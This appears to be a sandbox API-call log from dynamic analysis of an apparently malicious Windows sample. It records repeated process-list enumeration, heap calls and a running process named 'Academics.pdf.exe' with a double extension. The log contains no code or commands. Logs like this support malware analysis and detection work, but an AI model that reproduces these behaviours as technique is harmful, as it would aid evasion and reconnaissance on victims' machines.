th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0307.358] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0307.359] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0307.359] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0307.360] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0307.361] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0307.362] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0307.362] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0307.363] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0307.364] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0307.364] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0307.365] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0307.366] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0307.366] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0307.368] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0307.369] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0307.369] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.370] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0307.371] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.372] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0307.372] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0307.373] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0307.374] CloseHandle (hObject=0x294) returned 1 [0307.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0307.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0307.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0307.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0307.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0307.374] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0307.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0307.374] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0307.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0307.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0307.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0307.374] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0307.376] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0307.377] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0307.378] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0307.378] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0307.379] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0307.380] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0307.381] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0307.382] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0307.383] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0307.383] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0307.384] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.385] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.385] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.386] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.387] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.387] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0307.388] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.389] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.390] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0307.390] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0307.391] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0307.392] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0307.393] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.393] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0307.394] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0307.395] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0307.395] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0307.396] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0307.397] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0307.398] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0307.399] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0307.399] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0307.400] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0307.401] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0307.401] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0307.402] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0307.403] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0307.403] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0307.404] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0307.405] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0307.405] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0307.406] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0307.407] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.407] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0307.408] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.409] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0307.409] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0307.410] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0307.411] CloseHandle (hObject=0x294) returned 1 [0307.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0307.411] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0307.411] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0307.411] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0307.413] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0307.413] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0307.414] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0307.415] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0307.416] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0307.416] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0307.417] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0307.418] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0307.418] Process32NextW 